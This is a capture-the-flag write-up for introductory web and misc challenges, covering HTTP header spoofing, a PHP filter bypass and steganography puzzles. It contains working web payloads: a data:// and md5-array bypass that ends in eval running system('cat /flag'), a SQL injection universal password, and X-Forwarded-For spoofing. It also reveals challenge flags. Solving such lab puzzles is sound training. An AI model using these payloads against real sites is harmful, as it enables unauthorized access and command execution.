Table of Contents

  • WEEK1
  • WEB
  • HTTP
  • Head?Header!
  • 我真的会谢 (Thanks a Lot)
  • NotPHP
  • Word-For-You
  • MISC
  • Yesec no drumsticks 1
  • qsdz's girlfriend 1
  • Look my eyes
  • EzSnake
  • 奇怪的音频 (Strange Audio)



WEEK1

WEB

HTTP

Level 1

Please `GET` me your `name`,I will tell you more things.

Just pass a GET parameter: ?name=mochu7

Level 2

Hello,mochu7. Please `POST` me the `key` Again.But Where is the key?

The page source contains a comment: <!--Key: ctfisgood-->

Send it as a POST parameter: key=ctfisgood

Level 3

You are smart but you are not `admin`.

Comment in the page source: <!--Check something-->

Modify the Cookie.

Head?Header!

Level 1

Must Use `CTF` Brower!

User-Agent: CTF

Level 2

Must From `ctf.com`

Referer: ctf.com

Level 3

Only Local User Can Get Flag

X-Forwarded-For: 127.0.0.1

我真的会谢 (Thanks a Lot)

Part 1: robots.txt

Part 2: index.php.swp

Part 3: www.zip

NotPHP

<?php
error_reporting(0);
highlight_file(__FILE__);
if(file_get_contents($_GET['data']) == "Welcome to CTF"){
    if(md5($_GET['key1']) === md5($_GET['key2']) && $_GET['key1'] !== $_GET['key2']){
        if(!is_numeric($_POST['num']) && intval($_POST['num']) == 2077){
            echo "Hack Me";
            eval("#".$_GET['cmd']);
        }else{
            die("Number error!");
        }
    }else{
        die("Wrong Key!");
    }
}else{
    die("Pass it!");
}

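For file_get_contents($_GET['data']) == "Welcome to CTF", the stream wrappers (pseudo-protocols) that can supply the content are:

php://input
data://text/plain;base64,xxx

Only the data:// wrapper works here because of the later bypass: the num check needs the POST body for its own parameter, so the body cannot also be the string read through php://input.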

For the bypass of md5($_GET['key1']) === md5($_GET['key2']) && $_GET['key1'] !== $_GET['key2'], refer to

!is_numeric($_POST['num']) && intval($_POST['num']) == 2077 can be bypassed with 2077x or 2077%00

/?data=data://text/plain;base64,V2VsY29tZSB0byBDVEY=&key1[]=1&key2[]=2&cmd=%0asystem("cat /flag");

num=2077a

Word-For-You

Description

Mr. Cyber Dingzhen (赛博顶针) quietly told Mr.H the flag, and Mr.H put the flag in the database to keep it safe. Can you find it?

Universal password
payload: NewCTFer'or '1'='1

MISC

Yesec no drumsticks 1

LSB steganography with no password; Stegsolve solves it in one go.

qsdz’s girlfriend 1

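Description: I have lost my memory. This is an archive I found on my desktop, but I have forgotten its password... Can you help me find my girlfriend's name? The flag format is: flag{girlfriend's name_girlfriend's birthday}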

A birthday is usually eight digits, all numeric.

The end of the image holds a base64-encoded hint:

My girlfriend's name has six letters and the first letter is capitalized

Google reverse image search

Look my eyes

Going by the challenge name, use SilentEye with the default password.

PS C:\Users\Administrator> php -r "var_dump(base64_decode('ZmxhZ3tMMG9rX20zXzFuX215X2V5M3N9'));"
Command line code:1:
string(24) "flag{L0ok_m3_1n_my_ey3s}"

EzSnake

Reach 114 points to get a flag.

Open EzSnake.jar with jd-gui and search for the keyword 114.

The code here applies an XOR operation to the file /statics/1919810/114514. Rename the .jar file to .zip and extract it to get the 114514 file.

# Undo the single-byte XOR (key 0x58) applied to the extracted 114514 file.
with open('114514', 'rb') as f1, open('flag', 'wb') as f2:
    f2.write(bytes(b ^ 0x58 for b in f1.read()))

After the XOR, the resulting flag file is a PNG.
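An added example (not part of the original writeup) that generalizes the step above: instead of reading the key 0x58 out of the decompiled code, it recovers a single-byte XOR key from the known PNG signature and checks that all eight signature bytes agree before decoding. The function names and the sample bytes are constructed for illustration.

```python
from typing import Optional

# The fixed 8-byte signature every PNG file starts with.
PNG_MAGIC = b"\x89PNG\r\n\x1a\n"


def recover_xor_key(blob: bytes, magic: bytes = PNG_MAGIC) -> Optional[int]:
    """Return the single-byte key that maps blob's header onto magic, else None."""
    if len(blob) < len(magic):
        return None
    # Known plaintext: ciphertext byte XOR expected byte gives the key.
    key = blob[0] ^ magic[0]
    # A real single-byte key must explain every signature byte, not just the first.
    if all(c ^ key == m for c, m in zip(blob, magic)):
        return key
    return None


def xor_decode(blob: bytes, key: int) -> bytes:
    """XOR every byte with key; the operation is its own inverse."""
    return bytes(b ^ key for b in blob)


def decode_png(blob: bytes) -> bytes:
    """Recover the key from the header and return the decoded bytes."""
    key = recover_xor_key(blob)
    if key is None:
        raise ValueError("header is not a PNG signature under a single-byte XOR")
    return xor_decode(blob, key)


# Constructed sample (not the challenge file): PNG signature + start of IHDR,
# obfuscated with 0x58, the key the writeup found in the decompiled jar.
SAMPLE_PLAIN = PNG_MAGIC + b"\x00\x00\x00\rIHDR"
SAMPLE_OBFUSCATED = xor_decode(SAMPLE_PLAIN, 0x58)

if __name__ == "__main__":
    key = recover_xor_key(SAMPLE_OBFUSCATED)
    print(f"recovered key: {key:#04x}")
    print(decode_png(SAMPLE_OBFUSCATED)[:8])
```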


Restore the QR code's finder patterns and it scans normally.

>>> from base64 import *
>>> b64decode('ZmxhZ3tZMHVfNHJlXzBuZV9vTmVfMG5FX3N0NFJ9=')
b'flag{Y0u_4re_0ne_oNe_0nE_st4R}'

奇怪的音频 (Strange Audio)
